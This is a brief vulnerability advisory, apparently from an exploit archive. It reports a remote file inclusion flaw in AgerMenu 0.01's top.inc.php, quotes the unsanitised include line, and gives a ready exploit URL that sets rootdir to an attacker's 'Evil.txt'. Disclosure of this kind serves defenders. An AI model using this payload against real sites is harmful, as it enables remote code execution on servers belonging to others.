 |
|
|
|
| From: | GolD_M <hacker__(at)_w.cn> | | Date: | 08.02.2007 | | Subject: | AgerMenu 0.01 (top.inc.php rootdir) Remote File Include Vulnerability |
===============================================================
Discovered by GolD_M(Mahmnood_ali) & & Contact: HackEr_@W.Cn
===============================================================
URL Script: http://www.chbs.dk/proj/agermenu/agermenu-0.01.tgz
===============================================================
V.CODE: In : [path]/example/inc/top.inc.php
include $rootdir."inc/agermenu.func.php";
===============================================================
Exploit: v.Cc/[path]/example/inc/top.inc.php?rootdir=Evil.txt?
===============================================================
|
|
|
|
|
|
|
|